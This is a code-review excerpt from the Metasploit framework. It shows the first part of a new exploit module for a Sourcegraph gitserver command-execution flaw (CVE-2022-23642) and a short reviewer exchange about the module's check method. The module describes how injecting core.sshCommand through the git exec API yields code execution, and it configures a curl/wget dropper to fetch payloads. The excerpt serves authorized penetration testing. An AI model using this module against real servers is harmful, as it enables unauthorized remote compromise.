modules/exploits/linux/http/sourcegraph_gitserver_sshcmd.rb

```diff
@@ -0,0 +1,163 @@
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  prepend Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Sourcegraph gitserver sshCommand RCE',
+        'Description' => %q{
+          A vulnerability exists within Sourcegraph's gitserver component that allows a remote attacker to execute
+          arbitrary OS commands by modifying the core.sshCommand value within the git configuration. This command can
+          then be triggered on demand by executing a git push operation. The vulnerability was patched by introducing a
+          feature flag in version 3.37.0. This flag must be enabled for the protections to be in place which filter the
+          commands that are able to be executed through the git exec REST API.
+        },
+        'Author' => [
+          'Altelus1', # github PoC
+          'Spencer McIntyre' # metasploit module
+        ],
+        'References' => [
+          ['CVE', '2022-23642'],
+          ['URL', 'https://github.com/sourcegraph/sourcegraph/security/advisories/GHSA-qcmp-fx72-q8q9'],
+          ['URL', 'https://github.com/Altelus1/CVE-2022-23642'],
+        ],
+        'DisclosureDate' => '2022-02-18', # Public disclosure
+        'License' => MSF_LICENSE,
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_memory
+            },
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              # when the OS command is executed, it's executed twice which will cause some of the command stagers to
+              # be corrupt, these two work even for larger payloads because they're downloaded in a single command
+              'CmdStagerFlavor' => %w[curl wget],
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper
+            },
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 3178
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('EXISTING_REPO', [false, 'An existing, cloned repository'])
+    ])
+  end
+
+  def check
+    begin
+      cloned_repos = send_request_list
+    rescue RuntimeError => e
+      return CheckCode::Unknown(e.message)
+    end
+
+    if cloned_repos.empty?
+      vprint_warning('There must be at least 1 cloned git repo to be exploitable.')
+      return CheckCode::Detected
```

Comment:
Seems like these should be combined?

```suggestion
      return CheckCode::Detected('No cloned repositories. There must be at least 1 cloned git repo to be exploitable.')
```

Reply:
I ended up reworking the check method a bit. Turns out that you can try to trigger the vulnerability using a non-existing repo and analyze the response to reliably determine if the filtering is in place. The response when the filtering is in place is returned whether or not the repo exists.